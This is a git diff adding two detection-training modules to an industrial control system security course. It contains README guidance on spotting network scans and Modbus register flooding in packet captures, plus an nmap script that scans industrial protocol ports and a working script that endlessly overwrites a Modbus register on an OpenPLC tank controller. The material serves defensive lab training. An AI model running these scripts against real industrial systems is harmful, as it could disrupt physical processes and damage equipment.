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# Byte-compiled / optimized / DLL files
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index 829ca59..657644d 100644
--- a/training/README.md
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@@ -14,4 +14,6 @@ This recommended sequence is designed to build your knowledge progressively, lay
1. [Flood & overwrite](flood_overwrite/README.md)
1. [Password attack](password_attack/README.md)
1. [OPC-UA](opcua/README.md)
-1. [Man-in-the-Middle (MitM)](mitm/README.md)
\ No newline at end of file
+1. [Man-in-the-Middle (MitM)](mitm/README.md)
+1. [Detect Basic](detect_basic/README.md)
+1. [Detect Overwrite](detect_overwrite/README.md)
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+# Detection Training - Basic
+In this training, we focus on how to detect network scanning activities using PCAP (Packet Capture) data.
+PCAP files capture the raw network traffic data and are valuable for the security operation center (SOC) or forensic analysis of network communications.
+Attackers use different types of network scanning techniques to map out the network and gather intelligence.
+Common techniques include:
+1. ***Ping Sweep***:
+ * Attackers send ICMP Echo Requests to multiple IP addresses to determine which hosts are online.
+2. ***Port Scanning***:
+ * Tools like Nmap are used to scan for open ports on target systems.
+ Common scan types include:
+ * SYN scan (Half-Open Scan): Sends SYN packets to check if a port is open.
+ * TCP Connect Scan: Establishes a full TCP connection with the target port.
+ * UDP Scan: Tests for open UDP ports, commonly used on industrial protocols like Modbus (port 502).
+ * Service Detection: Queries services running on open ports to determine their versions (e.g., OPC UA on port 4840).
+3. ***Application Layer Scanning***:
+ * Attackers scan for specific application protocols such as Modbus, DNP3, or OPC UA by probing for industrial control protocols that indicate system roles.
+Detecting and mitigating network scanning on industrial systems is a critical first step in preventing cyberattacks.
+By capturing and analyzing network traffic through PCAP files, security teams can identify early signs of an attack and take appropriate action before an adversary gains deeper access to the system.
+Which ports do the attacker scan?
+Which ports are open, and which are closed?
+ Solution
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diff --git a/training/detect_basic/recon.py b/training/detect_basic/recon.py
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index 0000000..69e8720
--- /dev/null
+++ b/training/detect_basic/recon.py
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+import nmap
+import sys
+import logging
+# Configure logging to console (stdout)
+logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s',
+ level=logging.INFO,
+ handlers=[logging.StreamHandler()])
+def scan_industrial_ports(ip):
+ # Create a PortScanner object
+ nm = nmap.PortScanner()
+ # Define the ports to scan: HTTP (80), Modbus (502), OPC UA (4840)
+ ports_to_scan = '80,102, 502,4840, 20000, 44818'
+ try:
+ # Log the start of the scan
+ logging.debug(f"Starting scan for IP: {ip} on ports 80, 102, 502, 4840, 20000, 44818")
+ # Perform a version detection scan on the specified ports
+ logging.debug(f"Scanning {ip} for HTTP, S7, Modbus, OPC UA, DNP3, and Ethernet/IP ports...")
+ nm.scan(ip, ports_to_scan, arguments='-sV')
+ # Check if any ports are open and print their details
+ if nm.all_hosts():
+ for host in nm.all_hosts():
+ host_info = f"Host: {host} ({nm[host].hostname()})\nState: {nm[host].state()}"
+ logging.debug(host_info)
+ logging.debug(host_info)
+ for proto in nm[host].all_protocols():
+ proto_info = f"\nProtocol: {proto}"
+ logging.debug(proto_info)
+ ports = nm[host][proto].keys()
+ for port in sorted(ports):
+ port_info = nm[host][proto][port]
+ service_info = (f"Port: {port}\tState: {port_info['state']}\n"
+ f"Service: {port_info['name']}\tVersion: {port_info.get('version', 'Unknown')}")
+ logging.debug(service_info)
+ else:
+ msg = f"No information found for IP {ip}"
+ logging.warning(msg)
+ except nmap.PortScannerError as e:
+ error_msg = f"Nmap error: {e}"
+ logging.debug(error_msg)
+ except Exception as e:
+ error_msg = f"An unexpected error occurred: {e}"
+ logging.debug(error_msg)
+if __name__ == "__main__":
+ if len(sys.argv) != 2:
+ logging.error("Usage: python3 recon.py ")
+ sys.exit(1)
+ # Get the IP address from the command-line arguments
+ ip_address = sys.argv[1]
+ # Run the scan
+ logging.info("Recon started")
+ scan_industrial_ports(ip_address)
+ logging.info("Recon finished")
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@@ -0,0 +1,67 @@
+# Detection Training - Override
+One common attack is Modbus TCP register flooding, where an attacker sends a continuous stream of malicious Modbus commands to overwrite or spoof register values.
+This can disrupt processes, cause equipment failure, or provide incorrect data to operators.
+This training focuses on how to detect this type of attack by analyzing network traffic and monitoring system behavior.
+## Indicators of Modbus Flooding Attacks
+Detecting Modbus flooding and register overwriting attacks requires understanding how normal Modbus traffic behaves and recognizing anomalies in the communication pattern. Key indicators include:
+1. ***High Frequency of Modbus Write Requests***
+ Modbus systems typically have a stable frequency of write operations. A sudden spike in write requests, particularly to the same registers, is a sign of flooding. Monitor for:
+ Unusual write frequencies: Multiple write commands to the same register in a short time span.
+ Repeated overwrites: The same register being modified continuously.
+2. ***Unexplained Process Values Changes***
+ When a Modbus register is being spoofed, the values stored in registers might change frequently without corresponding physical events. For example:
+ A temperature sensor reports fluctuating values despite stable environmental conditions.
+ Equipment parameters (e.g., pressure, motor speed) are altered without operator action.
+3. ***Unusual Source IPs or Unauthorized Devices***
+ Flooding may come from unauthorized IP addresses or devices not normally involved in the communication. Look for:
+ Write commands originating from unknown sources.
+ Devices sending Modbus traffic that do not typically perform write operations.
+4. ***Network Traffic Abnormalities***
+ Flooding often generates a high volume of packets, potentially leading to congestion or delays in legitimate traffic. Watch for:
+ * Unusually high Modbus traffic: A sharp increase in Modbus TCP packets on the network.
+ * Packet loss: Legitimate Modbus traffic may be delayed or dropped due to the attack.
+* What is happening with the physical process?
+* What can you observe within the network capture?
+***!!! Execute the python script without looking into it !!!***
+python3 override.py
+ Solution
+* ***Modbus Filter:***
+ To filter only Modbus traffic, use the following filter in Wireshark:
+ ```sh
+ tcp.port == 502
+ ```
+* ***Identifying Excessive Write Requests:***
+ Apply a filter for Modbus function codes responsible for writing registers:
+ ```sh
+ modbus.func_code == 6 || modbus.func_code == 16
+ ```
+ Look for a large number of write requests to the same register (e.g., modbus.reference_num indicates the register address).
+* ***IO Graphs:***
+ Use Wireshark's IO Graphs to visualize the traffic over time. A spike in the number of write requests is a strong indicator of flooding.
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diff --git a/training/detect_overwrite/override.py b/training/detect_overwrite/override.py
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index 0000000..062de4e
--- /dev/null
+++ b/training/detect_overwrite/override.py
@@ -0,0 +1,46 @@
+#!/usr/bin/env python3
+import time
+from pymodbus.client import ModbusTcpClient
+import sys
+import logging
+# Configure logging to console (stdout)
+logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s',
+ level=logging.DEBUG,
+ handlers=[logging.StreamHandler()])
+# Value of high pressure tank (HPT), which should be flooded
+gst = 1
+def scan_industrial_ports(ip):
+ # Connect to ModbusTCP of the OpenPLC
+ client = ModbusTcpClient(host=ip,port=502) # Create client object
+ client.connect() # connect to device, reconnect automatically
+ # While true loop for flooding
+ while True:
+ logging.debug("Setting GST state to fixed value " + str(gst))
+ client.write_registers(1124,gst) #(register, value, unit)
+ time.sleep(0.001)
+ client.close() # Disconnect device
+if __name__ == "__main__":
+ if len(sys.argv) != 2:
+ logging.error("Usage: python3 override.py ")
+ sys.exit(1)
+ # Get the IP address from the command-line arguments
+ ip_address = sys.argv[1]
+ logging.debug("This script will flood the value of the gas storage tank (GST) of the OpenPLC")
+ logging.debug("Flodding IP: " + str(ip_address))
+ # Run the scan
+ logging.info("Attack started")
+ time.sleep(2)
+ scan_industrial_ports(ip_address)
+ logging.info("Attack finished")
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